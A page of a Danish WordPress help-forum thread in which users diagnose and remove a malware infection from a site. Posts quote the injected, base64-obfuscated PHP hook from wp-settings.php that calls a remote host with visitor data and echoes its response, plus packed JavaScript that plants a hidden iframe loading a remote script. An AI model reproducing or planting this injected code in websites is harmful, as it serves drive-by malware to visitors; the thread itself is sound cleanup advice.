Hov. Du er ikke logget ind.
DU SKAL VÆRE LOGGET IND, FOR AT INTERAGERE PÅ DENNE SIDE

Hjælp! - pludselig advarsel om muligt malware ved adgang til mit site

Side 2 ud af 3 (25 indlæg)
Fra Vejle
Tilmeldt 24. Jan 10
Indlæg ialt: 2537
Fra  Your Virtual Ninja Skrevet kl. 12:14
Hvor mange stjerner giver du? :

Fenris:

thats very nice of you! 

Sending a PM

Replied, and thankyou :)

Tilmeldt 21. Sep 06
Indlæg ialt: 2606
Fra  StreetPatrol.com StreetPatrol.dk Skrevet kl. 14:35
Hvor mange stjerner giver du? :
Gennemsnit 5,0 stjerner givet af 2 person

1. Åben filen wp-settings.php

2. Søg efter "counter_wordpress" i kildekoden.

3. Hvis den er der så slet hele den function counter_wordpress og dertilhørende add_action-

Ser cirka sådan her ud - og er flyttet godt til højre i koden så den ikke er synlig lige når du åbner filen: 


function counter_wordpress()
{$_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua =
urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 2);$re = curl_exec($ch);curl_close($ch);echo $re;}
add_action('wp_head', 'counter_wordpress');

Sparetips på Sparefeber.dk

Tilmeldt 21. Sep 06
Indlæg ialt: 2606
Fra  StreetPatrol.com StreetPatrol.dk Skrevet kl. 14:46
Hvor mange stjerner giver du? :

Hvis den ikke er i din wp-settings.php, så download dine WP-filer til computeren og brug et program til at søge efter kodestumpen "counter_wordpress". 

Jeg ved ikke lige hvilket program jeg kan anbefale. Har selv Microsoft Visual Studio og det er nok lidt overkill i det her tilfælde. 

Sparetips på Sparefeber.dk

Tilmeldt 21. Sep 06
Indlæg ialt: 2606
Fra  StreetPatrol.com StreetPatrol.dk Skrevet kl. 14:49
Hvor mange stjerner giver du? :

Til praktisk info, så ser din virus i kildekoden på din hjemmeside sådan her ud. Det er nemlig en lidt tricky kode, der ikke viser sig hver gang du besøger din side. 

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=kCoffee||c.toString(a)}k=[function(e){return dEmail}];e=function(){return'\\w+'};c=1};while(c--){if(kCoffee){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),kCoffee)}}return p}('d 9(){5=2.e(\'7\');f(!5){8 0=2.c(\'3\');2.g.h(0);0.6=\'7\';0.1.a=\'4\';0.1.b=\'4\';0.1.n=\'i\';0.r=\'s://q.o.j/3.k?6=l\'}}8 t=m("9()",p);',30,30,'el|style|document|iframe|1px|element|id|yahoo_api|var|MakeFrameEx|width|height|createElement|function|getElementById|if|body|appendChild|none|pl|php|2b8325qvzjut0iv8b87u9nlxnan0kpc|setTimeout|display|orge|500|drcutrapalis|src|http|'.split('|'),0,{}))
</script>

Sparetips på Sparefeber.dk

Tilmeldt 20. Apr 07
Indlæg ialt: 16014
30% af profil udfyldt
Skrevet kl. 08:33
Hvor mange stjerner giver du? :
Gennemsnit 5,0 stjerner givet af 2 person

Hej Gita, 

allerførst tak for dit svar! 

Det ser ud til du har helt ret, der er ihvertfald den kode snip i wp-settings.php.

Fik du advarslen da du prøvede at besøge siden?

Så hvis jeg bare sletter denne kode snippet, så er "virussen" slettet, eller er der andet jeg bør gøre?

Og endelig, hvordan er det kommet / forhindrer jeg det i at komme igen?

Phillip der var så venlig at tilbyde at lave dette, har du set Gitas indlæg

Det her er alt der står i området hvor koden er:  

http://codepad.org/1mX8OpCy

Læg mærke til man som Gita skrev skal scrolle langt til høre for at se en del af koden.

 

Fra Esbjerg
Tilmeldt 11. Aug 10
Indlæg ialt: 1
Skrevet kl. 08:44
Hvor mange stjerner giver du? :

Hej.

Jeg har netop prøvet, og jeg får en Trojan-advarsel fra ESET NOD, som netop viser en drsheldon.org.pl-adresse.

Tror også den mystiske, krypterede kode er skyld i det.

Tilmeldt 20. Apr 07
Indlæg ialt: 16014
30% af profil udfyldt
Skrevet kl. 08:49
Hvor mange stjerner giver du? :

Hej Lars, 

Tak for dit indlæg, ret at få bekræftet fra en "uvildig" her på amino at der er noget galt.. 

Tilmeldt 21. Sep 06
Indlæg ialt: 2606
Fra  StreetPatrol.com StreetPatrol.dk Skrevet kl. 09:34
Hvor mange stjerner giver du? :
Gennemsnit 5,0 stjerner givet af 1 person

Hej Fenris,

Det haster at få det fjernet, medmindre det ikke gør noget sitet ryger ud af Google :-)

Hvis du er nervøs for at slette det forkerte, så skriv i det mindste følgende kode udenomkring, da koden så ikke bliver kørt og du let kan rette tilbage igen:

/*

Din viruskode

*/ 

Det her skal med sikkerhed væk:
add_action('wp_head', 'counter_wordpress');
Der skulle også være en "function  counter_wordpress". Den skal også væk.

Jeg gik ikke direkte ind på siden, da jeg ved der er malware. Jeg tjekkede kildekoden og kan se din malware-kode.  

Jeg skriver noget om malware i WordPress her lidt senere:
http://streetpatrol.dk/wordpress/malware-virus

Sparetips på Sparefeber.dk

Tilmeldt 20. Apr 07
Indlæg ialt: 16014
30% af profil udfyldt
Skrevet kl. 10:29
Hvor mange stjerner giver du? :
Gennemsnit 5,0 stjerner givet af 1 person

Jeg har nu slettet koden nu. 

Er der noget jeg skal gøre i forhold til Google? 

Tak for hjælpen Gita. 

Tilmeldt 21. Sep 06
Indlæg ialt: 2606
Fra  StreetPatrol.com StreetPatrol.dk Skrevet kl. 13:36
Hvor mange stjerner giver du? :
Gennemsnit 5,0 stjerner givet af 1 person

Selv tak, Fenris.

Lige et hurtigt svar angående det vigtigste mht sikkerhed.

Nu den tilsyneladende er væk, vil jeg dog tjekke at filattributter/sikkerhedsinstillinger til wp-config.php er sat til 750. De er muligvis sat til 664 eller noget i den dur. Hvis de er det kan de stadig få fat i dit password, selv hvis du er helt virusfri.

Det er i wp-config.php du har password til databasen liggende. Den har de sandsynligvis haft adgang til, så den ville ændre. Den skal selvsagt så også ændres i wp-config.php når du har fået password ændret. 

For fremover at holde øje med om der kommer ny malware så kan du bruge Google Webmaster tools. Den har en Malware diagnostics, der kan sende dig en e-mail hvis du bliver ramt igen. 

Det vigtigste i forhold til Google og dine besøgende var at få den væk, og det har du nu. Det skriver jeg lidt mere om på min hjemmeside hvordan det er smartest at håndtere, men jeg når det vist ikke i dag. 

Her er lidt om sikkerhedsindstillinger i WordPress:
http://codex.wordpress.org/Hardening_WordPress 

Sparetips på Sparefeber.dk

Side 2 ud af 3 (25 indlæg)